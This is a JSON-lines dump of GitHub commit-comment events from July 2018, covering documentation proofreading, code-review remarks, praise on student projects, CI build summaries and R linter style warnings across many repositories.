{"id":"7929789852","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623571,"position":403,"line":971,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:15:09Z","updated_at":"2018-07-06T16:15:09Z","author_association":"CONTRIBUTOR","body":"s/options/option/\r\nThis is referring to 1 thing, the Add Mount Point option."}},"created_at":"2018-07-06T16:15:09Z"}
{"id":"7929792430","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-frontend"},"payload":{"comment":{"id":29623580,"position":35,"line":33,"path":"assets/templates/blogs/blog_sample.html","commit_id":"b94b286519abdcad4d8f1056e5df97faacfd233d","created_at":"2018-07-06T16:15:41Z","updated_at":"2018-07-06T16:15:41Z","author_association":"MEMBER","body":"Čeprav tole dela, bi rajš vidu da imava standard z `ledinaAjax(\"GET\", ...)`"}},"created_at":"2018-07-06T16:15:41Z"}
{"id":"7929793699","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29623581,"position":26,"line":52,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/concrete/BlockReinforcedConcrete.java","commit_id":"9fd4add3541b60f590d7df4e601d751d1c40ccb6","created_at":"2018-07-06T16:15:56Z","updated_at":"2018-07-06T16:15:56Z","author_association":"MEMBER","body":"As resistant as crushed obsidian. Good!"}},"created_at":"2018-07-06T16:15:56Z"}
{"id":"7929794245","type":"CommitCommentEvent","actor":{"login":"mattberther"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":29623582,"position":4,"line":153,"path":"daily-rotate-file.js","commit_id":"3d8674f340632c4422eaf2dbc31a80107f7bdd6a","created_at":"2018-07-06T16:16:03Z","updated_at":"2018-07-06T16:16:03Z","author_association":"CONTRIBUTOR","body":"I'd welcome a PR, @flovilmart. :)"}},"created_at":"2018-07-06T16:16:03Z"}
{"id":"7929796040","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29623586,"position":null,"line":null,"path":null,"commit_id":"c0ab3c75065dd403c7a2fbad29278132dda1b7eb","created_at":"2018-07-06T16:16:27Z","updated_at":"2018-07-06T16:16:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-06T16:16:27Z"}
{"id":"7929798675","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"magordon97/Chatarang"},"payload":{"comment":{"id":29623595,"position":null,"line":null,"path":null,"commit_id":"3dc453eb8cdd3079ddf57fefc7b8be2b83fd8743","created_at":"2018-07-06T16:17:04Z","updated_at":"2018-07-06T16:17:04Z","author_association":"NONE","body":"Good work!"}},"created_at":"2018-07-06T16:17:04Z"}
{"id":"7929799911","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623598,"position":437,"line":1018,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:17:20Z","updated_at":"2018-07-06T16:17:20Z","author_association":"CONTRIBUTOR","body":"remove the comma\r\ns/data intact, but/data intact but/"}},"created_at":"2018-07-06T16:17:20Z"}
{"id":"7929800012","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"magordon97/Chatarang"},"payload":{"comment":{"id":29623599,"position":null,"line":null,"path":null,"commit_id":"eb8b8b1cd8adead9d47d869f59a8c7ec3921fe33","created_at":"2018-07-06T16:17:21Z","updated_at":"2018-07-06T16:17:21Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:17:21Z"}
{"id":"7929800514","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-frontend"},"payload":{"comment":{"id":29623600,"position":95,"line":66,"path":"assets/templates/blog_mainpage.html","commit_id":"14441cb41b906d3028dba5e44276b6f207d24422","created_at":"2018-07-06T16:17:27Z","updated_at":"2018-07-06T16:17:27Z","author_association":"MEMBER","body":"Čeprav tole dela, bi rajš vidu da imava standard z `ledinaAjax(\"GET\", ...)`"}},"created_at":"2018-07-06T16:17:27Z"}
{"id":"7929800654","type":"CommitCommentEvent","actor":{"login":"deathbeam"},"repo":{"name":"runelite/launcher"},"payload":{"comment":{"id":29623601,"position":70,"line":155,"path":"src/main/java/net/runelite/launcher/Launcher.java","commit_id":"1a967ae1a869add465773146ed3bfbbbe186e6d7","created_at":"2018-07-06T16:17:29Z","updated_at":"2018-07-06T16:17:29Z","author_association":"CONTRIBUTOR","body":"You should probably exit with -1 exit code here as well"}},"created_at":"2018-07-06T16:17:29Z"}
{"id":"7929802125","type":"CommitCommentEvent","actor":{"login":"exodrifter"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29623603,"position":11,"line":11,"path":"Scripts/UnityPython.cs","commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-06T16:17:47Z","updated_at":"2018-07-06T16:17:47Z","author_association":"OWNER","body":"That's correct, if you don't load the assembly, you will _not_ have access to it from a python script.\r\n\r\nThis assembly is used in the example scripts; look at [PythonUnityHelloWorld.cs](https://github.com/exodrifter/unity-python/blob/2e0bc6834c0b8769d84f69487e3b64b4803d8774/Examples/PythonUnityHelloWorld.cs)."}},"created_at":"2018-07-06T16:17:47Z"}
{"id":"7929807132","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MyThompson/Chatter"},"payload":{"comment":{"id":29623613,"position":null,"line":null,"path":null,"commit_id":"c3bddb7769c68e4b4394630b61f17a6261a03a5d","created_at":"2018-07-06T16:18:50Z","updated_at":"2018-07-06T16:18:50Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:18:50Z"}
{"id":"7929808033","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623615,"position":456,"line":1075,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:19:01Z","updated_at":"2018-07-06T16:19:01Z","author_association":"CONTRIBUTOR","body":"Remove extra space before \"They contain\""}},"created_at":"2018-07-06T16:19:01Z"}
{"id":"7929808301","type":"CommitCommentEvent","actor":{"login":"AuTyi"},"repo":{"name":"AuTyi/test123"},"payload":{"comment":{"id":29623616,"position":null,"line":null,"path":null,"commit_id":"10d82825b01ccb445d79e9bbbdec5fedeaea5070","created_at":"2018-07-06T16:19:05Z","updated_at":"2018-07-06T16:19:05Z","author_association":"OWNER","body":"no no not ok at all"}},"created_at":"2018-07-06T16:19:05Z"}
{"id":"7929808503","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MyThompson/Chatter"},"payload":{"comment":{"id":29623618,"position":null,"line":null,"path":null,"commit_id":"2e83a24471d91928422f8ff1d0c0a193d34d47ba","created_at":"2018-07-06T16:19:08Z","updated_at":"2018-07-06T16:19:08Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T16:19:08Z"}
{"id":"7929809833","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"MyThompson/Chatter"},"payload":{"comment":{"id":29623619,"position":null,"line":null,"path":null,"commit_id":"98dd7be597975274ebef2c0995ffb0ab9e3c7cd4","created_at":"2018-07-06T16:19:25Z","updated_at":"2018-07-06T16:19:25Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:19:25Z"}
{"id":"7929812356","type":"CommitCommentEvent","actor":{"login":"ChemicalInk"},"repo":{"name":"Durkastan/durkabot"},"payload":{"comment":{"id":29623623,"position":null,"line":null,"path":null,"commit_id":"733986764bb07ff788393d98051dfaa9fc222be4","created_at":"2018-07-06T16:19:58Z","updated_at":"2018-07-06T16:19:58Z","author_association":"CONTRIBUTOR","body":"I like how you copied it word-for-word. 😂 "}},"created_at":"2018-07-06T16:19:58Z"}
{"id":"7929815413","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-backend"},"payload":{"comment":{"id":29623630,"position":36,"line":229,"path":"core/models.py","commit_id":"d53c406a1e2a6d815caf26d64eac23b472a25043","created_at":"2018-07-06T16:20:38Z","updated_at":"2018-07-06T16:20:38Z","author_association":"MEMBER","body":"Za redis je prov ena funkcija `decode(dobesedno_karkol)` (je že importana tukaj) ki pretvori bytes (kar dobiš od redisa) v to kar zazna (boolean, string, int, ...) namesto da je vedno string"}},"created_at":"2018-07-06T16:20:38Z"}
{"id":"7929817882","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":29623637,"position":4,"line":153,"path":"daily-rotate-file.js","commit_id":"3d8674f340632c4422eaf2dbc31a80107f7bdd6a","created_at":"2018-07-06T16:21:09Z","updated_at":"2018-07-06T16:21:09Z","author_association":"NONE","body":"Good to know, also, we’d simply need searching by date, not by anything else. Would you still welcome à PR that only enables such partial queries? We could add a warning at startup so people prefer JSON logs instead."}},"created_at":"2018-07-06T16:21:09Z"}
{"id":"7929818989","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"miricayancey2025/chathell"},"payload":{"comment":{"id":29623638,"position":null,"line":null,"path":null,"commit_id":"9e61b720210bff2b62eb5f75e9b9f312b66ce994","created_at":"2018-07-06T16:21:22Z","updated_at":"2018-07-06T16:21:22Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T16:21:22Z"}
{"id":"7929819367","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623639,"position":463,"line":1079,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:21:27Z","updated_at":"2018-07-06T16:21:27Z","author_association":"CONTRIBUTOR","body":"Remove the comma after FreeBSD.\r\ns/ported to FreeBSD, and most/ported to FreeBSD and most/\r\nNot sure why to remove the number of packages currently available other than it gets out of date. Don't feel strongly about keeping it though."}},"created_at":"2018-07-06T16:21:27Z"}
{"id":"7929819738","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29623640,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T16:21:32Z","updated_at":"2018-07-06T16:21:32Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-06T16:21:32Z"}
{"id":"7929822673","type":"CommitCommentEvent","actor":{"login":"ddubbert"},"repo":{"name":"th-koeln/open-product-evaluation-server"},"payload":{"comment":{"id":29623646,"position":null,"line":null,"path":null,"commit_id":"f3f886c6894710babc8164692ca47cbda05822f6","created_at":"2018-07-06T16:22:11Z","updated_at":"2018-07-06T16:22:11Z","author_association":"CONTRIBUTOR","body":"previous means #213c045"}},"created_at":"2018-07-06T16:22:11Z"}
{"id":"7929822953","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ecmwf/caliver"},"payload":{"comment":{"id":29623647,"position":null,"line":null,"path":null,"commit_id":"2c826e9929512d23c97467ee3dc372d58c830f1e","created_at":"2018-07-06T16:22:14Z","updated_at":"2018-07-06T16:22:14Z","author_association":"NONE","body":"[R/anomaly.R:3:1:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @description This function calculates the anomaly (standardised deviation from the mean climatology) of a forecast layer\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/anomaly.R:29:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L29) *style:* **Variable or function name should be snake_case.**\n```r\n​  meanClima <- raster::calc(x = clima[[clima_idx]],\n  ^~~~~~~~~\n```\n[R/anomaly.R:31:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​  meanClima <- raster::resample(x = meanClima, y = fc)\n  ^~~~~~~~~\n```\n[R/anomaly.R:33:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L33) *style:* **Variable or function name should be snake_case.**\n```r\n​  sdClima <- raster::calc(x = clima[[clima_idx]], fun = sd, progress = \"text\")\n  ^~~~~~~\n```\n[R/anomaly.R:34:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L34) *style:* **Variable or function name should be snake_case.**\n```r\n​  sdClima <- raster::resample(x = sdClima, y = fc)\n  ^~~~~~~\n```\n[R/anomaly.R:37:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L37) *style:* **Variable or function name should be snake_case.**\n```r\n​  anomalyMap <- (fc - meanClima) / sdClima\n  ^~~~~~~~~~\n```\n[R/anomaly.R:52:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L52) *style:* **Variable or function name should be snake_case.**\n```r\n​  anomalyMap <- fc\n  ^~~~~~~~~~\n```\n[R/anomaly.R:101:32:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/anomaly.R#L101) *style:* **Put spaces around all infix operators.**\n```r\n​         fill = heatcolors, bty=\"n\")\n                              ~^~\n```\n[R/plot_obs_vs_forecast.R:106:10:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/plot_obs_vs_forecast.R#L106) *style:* **Put spaces around all infix operators.**\n```r\n​    if (j+9 <= length(my_dates)){\n        ~^~\n```\n[R/plot_obs_vs_forecast.R:111:31:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/plot_obs_vs_forecast.R#L111) *style:* **Put spaces around all infix operators.**\n```r\n​    raster_mean_matrix[i, j:(j+w-1)] <- xmat[i, 1:w]\n                             ~^~\n```\n[R/plot_obs_vs_forecast.R:111:33:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/plot_obs_vs_forecast.R#L111) *style:* **Put spaces around all infix operators.**\n```r\n​    raster_mean_matrix[i, j:(j+w-1)] <- xmat[i, 1:w]\n                               ~^~\n```\n[R/ranking.R:3:1:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @description This function calculates the percentile ranking of a forecast layer\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ranking.R:24:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​  pMaps <- raster::calc(x = clima,\n  ^~~~~\n```\n[R/ranking.R:25:43:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L25) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                        fun = function(x) {quantile(x,\n                                          ^\n```\n[R/ranking.R:27:58:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​                                                    na.rm=TRUE)},\n                                                        ~^~\n```\n[R/ranking.R:30:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​  pMaps <- raster::resample(pMaps, fc, progress = \"text\")\n  ^~~~~\n```\n[R/ranking.R:40:3:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L40) *style:* **Variable or function name should be snake_case.**\n```r\n​  rankingMap <- fc\n  ^~~~~~~~~~\n```\n[R/ranking.R:70:1:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L70) *style:* **Lines should not be more than 80 characters.**\n```r\n​  heatcolors <- c(\"beige\", \"orange1\", \"orange2\", \"orange3\", \"orangered\", \"red\", \"brown\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ranking.R:79:32:](https://github.com/ecmwf/caliver/blob/2c826e9929512d23c97467ee3dc372d58c830f1e/R/ranking.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​         fill = heatcolors, bty=\"n\")\n                              ~^~\n```"}},"created_at":"2018-07-06T16:22:14Z"}
{"id":"7929829759","type":"CommitCommentEvent","actor":{"login":"ddubbert"},"repo":{"name":"th-koeln/open-product-evaluation-server"},"payload":{"comment":{"id":29623669,"position":null,"line":null,"path":null,"commit_id":"213c045f9606aae1aa9cf8e3f07741194532188f","created_at":"2018-07-06T16:23:44Z","updated_at":"2018-07-06T16:23:44Z","author_association":"CONTRIBUTOR","body":"update for issues #71 and #70 "}},"created_at":"2018-07-06T16:23:44Z"}
{"id":"7929831520","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29623676,"position":null,"line":null,"path":null,"commit_id":"20dcc5e4eea0c70e8f472df80e2708a09584a76b","created_at":"2018-07-06T16:24:08Z","updated_at":"2018-07-06T16:24:08Z","author_association":"MEMBER","body":"@soulseekah Do we need to update DataTables or DIY as well? If so, can you do that please?"}},"created_at":"2018-07-06T16:24:08Z"}
{"id":"7929837246","type":"CommitCommentEvent","actor":{"login":"SammyK"},"repo":{"name":"facebook/php-graph-sdk"},"payload":{"comment":{"id":29623681,"position":null,"line":null,"path":null,"commit_id":"4a1c99fc2f2d263ca6cc6c8707788e1046568290","created_at":"2018-07-06T16:25:26Z","updated_at":"2018-07-06T16:25:26Z","author_association":"COLLABORATOR","body":"@martinbean Yeah, unfortunately I think it was actually me who added this many years ago in a big PR thinking I was being cheeky and funny, but when I stumbled upon this the other day it felt really creepy and inappropriate. I'm really sorry to anyone who stumbled upon this and was turned off by the crassness. 😞 \r\n\r\n@yguedidi Will do! Sorry about that - I'm a bit rusty on the process we had set up a while ago. Outside of cherry-picking `5.x` features to `master`, I'll make sure to get a PR rocking for other changes. :)"}},"created_at":"2018-07-06T16:25:26Z"}
{"id":"7929851013","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29623707,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-06T16:28:30Z","updated_at":"2018-07-06T16:28:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T16:28:30Z"}
{"id":"7929851222","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"heckenna/chatarang"},"payload":{"comment":{"id":29623708,"position":null,"line":null,"path":null,"commit_id":"79ddf520ace251ccdf31d07006a2007f78cf8acf","created_at":"2018-07-06T16:28:33Z","updated_at":"2018-07-06T16:28:33Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T16:28:33Z"}
{"id":"7929853143","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29623711,"position":2,"line":155,"path":"src/guiengine/widgets/icon_button_widget.hpp","commit_id":"106d4c3c08a21bda760dbda643d0ee3daeed2772","created_at":"2018-07-06T16:29:00Z","updated_at":"2018-07-06T16:29:00Z","author_association":"MEMBER","body":"Hs"}},"created_at":"2018-07-06T16:29:00Z"}
{"id":"7929853942","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"heckenna/chatarang"},"payload":{"comment":{"id":29623713,"position":null,"line":null,"path":null,"commit_id":"bb338d891a7052db17af3dc2e0007aa1a2d86d65","created_at":"2018-07-06T16:29:12Z","updated_at":"2018-07-06T16:29:12Z","author_association":"NONE","body":"This is a really big commit! Try breaking them up into small commits more often so it's easier to find the code you changed. "}},"created_at":"2018-07-06T16:29:12Z"}
{"id":"7929859489","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ecmwf/caliver"},"payload":{"comment":{"id":29623724,"position":null,"line":null,"path":null,"commit_id":"5b555bbdd05c3c5c23a30932e4ae949b840ea958","created_at":"2018-07-06T16:30:27Z","updated_at":"2018-07-06T16:30:27Z","author_association":"NONE","body":"[R/anomaly.R:3:1:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @description This function calculates the anomaly (standardised deviation from the mean climatology) of a forecast layer\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/anomaly.R:29:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L29) *style:* **Variable or function name should be snake_case.**\n```r\n​  meanClima <- raster::calc(x = clima[[clima_idx]],\n  ^~~~~~~~~\n```\n[R/anomaly.R:31:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​  meanClima <- raster::resample(x = meanClima, y = fc)\n  ^~~~~~~~~\n```\n[R/anomaly.R:33:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L33) *style:* **Variable or function name should be snake_case.**\n```r\n​  sdClima <- raster::calc(x = clima[[clima_idx]], fun = sd, progress = \"text\")\n  ^~~~~~~\n```\n[R/anomaly.R:34:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L34) *style:* **Variable or function name should be snake_case.**\n```r\n​  sdClima <- raster::resample(x = sdClima, y = fc)\n  ^~~~~~~\n```\n[R/anomaly.R:37:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L37) *style:* **Variable or function name should be snake_case.**\n```r\n​  anomalyMap <- (fc - meanClima) / sdClima\n  ^~~~~~~~~~\n```\n[R/anomaly.R:52:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L52) *style:* **Variable or function name should be snake_case.**\n```r\n​  anomalyMap <- fc\n  ^~~~~~~~~~\n```\n[R/anomaly.R:101:32:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/anomaly.R#L101) *style:* **Put spaces around all infix operators.**\n```r\n​         fill = heatcolors, bty=\"n\")\n                              ~^~\n```\n[R/plot_obs_vs_forecast.R:106:10:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/plot_obs_vs_forecast.R#L106) *style:* **Put spaces around all infix operators.**\n```r\n​    if (j+9 <= length(my_dates)){\n        ~^~\n```\n[R/plot_obs_vs_forecast.R:111:31:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/plot_obs_vs_forecast.R#L111) *style:* **Put spaces around all infix operators.**\n```r\n​    raster_mean_matrix[i, j:(j+w-1)] <- xmat[i, 1:w]\n                             ~^~\n```\n[R/plot_obs_vs_forecast.R:111:33:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/plot_obs_vs_forecast.R#L111) *style:* **Put spaces around all infix operators.**\n```r\n​    raster_mean_matrix[i, j:(j+w-1)] <- xmat[i, 1:w]\n                               ~^~\n```\n[R/ranking.R:3:1:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @description This function calculates the percentile ranking of a forecast layer\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ranking.R:24:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​  pMaps <- raster::calc(x = clima,\n  ^~~~~\n```\n[R/ranking.R:25:43:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L25) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                        fun = function(x) {quantile(x,\n                                          ^\n```\n[R/ranking.R:27:58:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​                                                    na.rm=TRUE)},\n                                                        ~^~\n```\n[R/ranking.R:30:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​  pMaps <- raster::resample(pMaps, fc, progress = \"text\")\n  ^~~~~\n```\n[R/ranking.R:40:3:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L40) *style:* **Variable or function name should be snake_case.**\n```r\n​  rankingMap <- fc\n  ^~~~~~~~~~\n```\n[R/ranking.R:70:1:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L70) *style:* **Lines should not be more than 80 characters.**\n```r\n​  heatcolors <- c(\"beige\", \"orange1\", \"orange2\", \"orange3\", \"orangered\", \"red\", \"brown\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ranking.R:79:32:](https://github.com/ecmwf/caliver/blob/5b555bbdd05c3c5c23a30932e4ae949b840ea958/R/ranking.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​         fill = heatcolors, bty=\"n\")\n                              ~^~\n```"}},"created_at":"2018-07-06T16:30:27Z"}
{"id":"7929860845","type":"CommitCommentEvent","actor":{"login":"senyzspalding"},"repo":{"name":"monixis/eaditorsearch"},"payload":{"comment":{"id":29623728,"position":null,"line":null,"path":null,"commit_id":"e6b52680813dc9d64c695fa9d91d16a3fd72c06f","created_at":"2018-07-06T16:30:45Z","updated_at":"2018-07-06T16:30:45Z","author_association":"COLLABORATOR","body":"Northing changed, the Atom editor did adjustments to the code for the beautify process"}},"created_at":"2018-07-06T16:30:45Z"}
